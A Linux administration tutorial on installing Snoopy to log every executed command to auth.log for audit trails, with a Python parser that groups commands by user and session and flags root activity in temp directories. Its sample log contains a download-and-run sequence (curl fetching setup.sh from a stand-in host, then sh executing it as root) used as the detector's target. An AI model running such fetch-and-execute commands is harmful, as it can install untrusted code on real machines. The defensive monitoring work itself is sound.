Creating audit trails – Logging commands on Linux with Snoopy

Our customers often want to set up an audit trail for accounting purposes. When something happens, they want to be able to see what happened, when it happened, and who did it. Keeping an audit trail is also becoming mandatory for compliance standards such as PCI DSS. One possible solution we cover here is Snoopy, a small library that logs every executed command.

How it works

Snoopy is a wrapper around the execve() function. This is the Linux system call a process uses to execute a program identified by its file name. Snoopy logs this file name, together with any arguments, to syslog using the authpriv facility. On most systems, messages for this facility end up in the file /var/log/auth.log.

Installing Snoopy

Debian / Ubuntu

apt-get install snoopy

During installation it will ask your permission to add the wrapper to /etc/, so that the library is loaded into new processes and can act as a middle-man between the program and execve().

Screenshot: Snoopy library loaded in /etc/

If the library is listed there, new commands should be intercepted and logged to your auth.log:

tail /var/log/auth.log

The output will look similar to:

Screenshot: output of /var/log/auth.log showing the events captured by Snoopy.

The installation of Snoopy is easy and quick. No further configuration is needed at this point, although you might want to consider configuring remote syslog. This way the log (and with it the audit trail) is stored at an external location, where it survives even if the machine itself is tampered with or lost.
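These lines only become an audit trail once something reads them and answers the questions from the introduction: what was run, when, and by whom. The parser below is an added example, not code from this page or from the Snoopy project. It assumes Snoopy's default message layout, `[uid:N sid:N tty:T cwd:D filename:F]: command`, and the auth.log excerpt it works on is constructed for the example (the host name, user and commands are made up). Besides per-user counts and a per-session timeline, it includes one simple check a defender typically wants: commands run as root from a temporary directory.

```python
import re
from collections import Counter, defaultdict

# Constructed auth.log excerpt. The snoopy lines follow the default Snoopy
# message layout (assumption); the sudo and CRON lines are ordinary auth.log
# noise that the parser must skip.
SAMPLE_AUTH_LOG = """\
Mar  3 09:12:01 web01 snoopy[2211]: [uid:1000 sid:2100 tty:/dev/pts/0 cwd:/home/alice filename:/bin/ls]: ls -la
Mar  3 09:12:05 web01 snoopy[2214]: [uid:1000 sid:2100 tty:/dev/pts/0 cwd:/home/alice filename:/usr/bin/sudo]: sudo -i
Mar  3 09:12:05 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/bin/bash
Mar  3 09:12:06 web01 snoopy[2215]: [uid:0 sid:2100 tty:/dev/pts/0 cwd:/root filename:/bin/bash]: -bash
Mar  3 09:13:40 web01 snoopy[2230]: [uid:0 sid:2100 tty:/dev/pts/0 cwd:/tmp filename:/usr/bin/curl]: curl -o setup.sh http://example.invalid/setup.sh
Mar  3 09:13:44 web01 snoopy[2231]: [uid:0 sid:2100 tty:/dev/pts/0 cwd:/tmp filename:/bin/sh]: sh ./setup.sh
Mar  3 09:15:00 web01 CRON[2240]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# One regex for the syslog prefix plus the Snoopy payload. The filename is
# matched up to the closing bracket, so paths may not contain ']'.
SNOOPY_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) snoopy\[(?P<pid>\d+)\]: "
    r"\[uid:(?P<uid>\d+) sid:(?P<sid>\d+) tty:(?P<tty>\S+) cwd:(?P<cwd>\S+) "
    r"filename:(?P<filename>[^\]]+)\]: (?P<cmdline>.*)$"
)

# Directories from which root normally has no reason to launch programs.
TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def parse_snoopy_line(line):
    """Return a dict for a Snoopy line, or None for any other auth.log line."""
    m = SNOOPY_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    for key in ("pid", "uid", "sid"):
        rec[key] = int(rec[key])
    return rec


def parse_auth_log(text):
    """Parse a whole auth.log text, keeping only the Snoopy records."""
    records = (parse_snoopy_line(line) for line in text.splitlines())
    return [r for r in records if r is not None]


def commands_per_uid(records):
    """Who ran how many commands: Counter keyed by uid."""
    return Counter(r["uid"] for r in records)


def session_timeline(records):
    """Group commands by session id (sid) so one login session can be replayed."""
    sessions = defaultdict(list)
    for r in records:
        sessions[r["sid"]].append((r["ts"], r["uid"], r["cmdline"]))
    return dict(sessions)


def root_commands_from_temp(records):
    """Flag commands executed as root with a working directory in a temp dir."""
    def in_temp(cwd):
        return any(cwd == d or cwd.startswith(d + "/") for d in TEMP_DIRS)
    return [r for r in records if r["uid"] == 0 and in_temp(r["cwd"])]


if __name__ == "__main__":
    recs = parse_auth_log(SAMPLE_AUTH_LOG)
    print("commands per uid:", dict(commands_per_uid(recs)))
    for sid, events in session_timeline(recs).items():
        print(f"session {sid}:")
        for ts, uid, cmd in events:
            print(f"  {ts} uid={uid} {cmd}")
    for r in root_commands_from_temp(recs):
        print(f"FLAG root ran {r['filename']} from {r['cwd']}: {r['cmdline']}")
```

Run it against a real file with `parse_auth_log(open("/var/log/auth.log").read())`. The session id (sid) is the key that ties a `sudo -i` and the root commands that follow back to the original user, which is exactly the "by whom" part of the audit trail; the uid alone would only tell you that root did it.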
